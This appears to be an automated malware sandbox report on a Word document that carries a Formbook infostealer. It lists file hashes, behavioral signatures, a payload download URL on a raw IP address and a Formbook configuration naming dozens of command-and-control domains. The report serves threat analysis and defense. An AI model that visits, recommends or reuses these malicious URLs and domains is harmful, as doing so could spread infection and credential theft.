General
-
Target
Sample.docx.doc
-
Size
10KB
-
Sample
230126-jzz2nsda72
-
MD5
884bf256520434bf9bdbd7a760176961
-
SHA1
2c79b5ca06f153b41a93d8ace4a7713d59621d9d
-
SHA256
574fce61f6fcf5e16be3fd8a77a56aeeb4d7a8868e2dccd0225c9c8c426e2913
-
SHA512
8216274591743f8f995cfa39753fb06f656d04fb676cde84d28f722adf3bcbe55330639344a898e37576dc71397b0743ecf83cbdbbc6d1c0a85596ee68bb92bd
-
SSDEEP
192:ScIMmtP8ar5G/bfIdTO3e/YnamWBX8ex6y3slZ:SPXt4ATO9nosMsH
Static task
static1
Behavioral task
behavioral1
Sample
Sample.docx
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
Sample.docx
Resource
win10v2004-20220812-en
Malware Config
Extracted
http://000000001000000000000020000000000001000000000@104.168.46.125/fresh/qwsdffhfhcvxcdgdfhfgjfjfgdfdfgxcvcxv.doc
Extracted
formbook
4.1
w12e
poshsalon.co.uk
ideeksha.net
eaglebreaks.com
exileine.me.uk
saveittoday.net
ceon.tech
estateagentswebsitedesign.uk
faropublicidade.com
depression-treatment-83678.com
informationdata16376.com
wirecreations.africa
coolsculpting-pros.life
ethoshabitats.com
amtindividual.com
gotoken.online
cherny-100-imec-msu.ru
historicaarcanum.com
gpsarhealthcare.com
kx1257.com
abdullahbinomar.com
utrem.xyz
khangkiencharcoal.com
fabvance-demos.online
jima68.com
1206b.com
guardianshipattorneyhouston.com
imziii.com
gaya-zohar.com
affluencegroup.net
xn--l3cj0azbal8cf5kobm.net
apogeebk.com
kwaranewsupdate.africa
buatosh.top
thenextlevelup.net
kristianstadspelforening.se
excertesi.com
swcctv.co.uk
actiontoyhouse.com
eisenhowerloan.com
brightupproduce.com
lojaedesign.com
kecheblog.com
vigilant-e.africa
internationaltaekwondo.net
annabenedetto.com
eboomp.pics
groupeverlaine.app
ebwwn.com
grasshopperspirit.online
getsafu.com
car-deals-75816.com
roddgunnstore.online
aiako.pro
homasp.club
bingo1818.xyz
work2050.co.uk
itgroup1.online
beyou-us.com
forthewitches.biz
felue.com
macroapi.net
hsfinancialservice.com
eoresla.club
alloahucondos.com
hkifarm.com
Targets
-
-
Target
Sample.docx.doc
-
Size
10KB
-
MD5
884bf256520434bf9bdbd7a760176961
-
SHA1
2c79b5ca06f153b41a93d8ace4a7713d59621d9d
-
SHA256
574fce61f6fcf5e16be3fd8a77a56aeeb4d7a8868e2dccd0225c9c8c426e2913
-
SHA512
8216274591743f8f995cfa39753fb06f656d04fb676cde84d28f722adf3bcbe55330639344a898e37576dc71397b0743ecf83cbdbbc6d1c0a85596ee68bb92bd
-
SSDEEP
192:ScIMmtP8ar5G/bfIdTO3e/YnamWBX8ex6y3slZ:SPXt4ATO9nosMsH
-
Formbook payload
-
Blocklisted process makes network request
-
Downloads MZ/PE file
-
Executes dropped EXE
-
Abuses OpenXML format to download file from external location
-
Loads dropped DLL
-
Uses the VBS compiler for execution
-
Suspicious use of SetThreadContext
-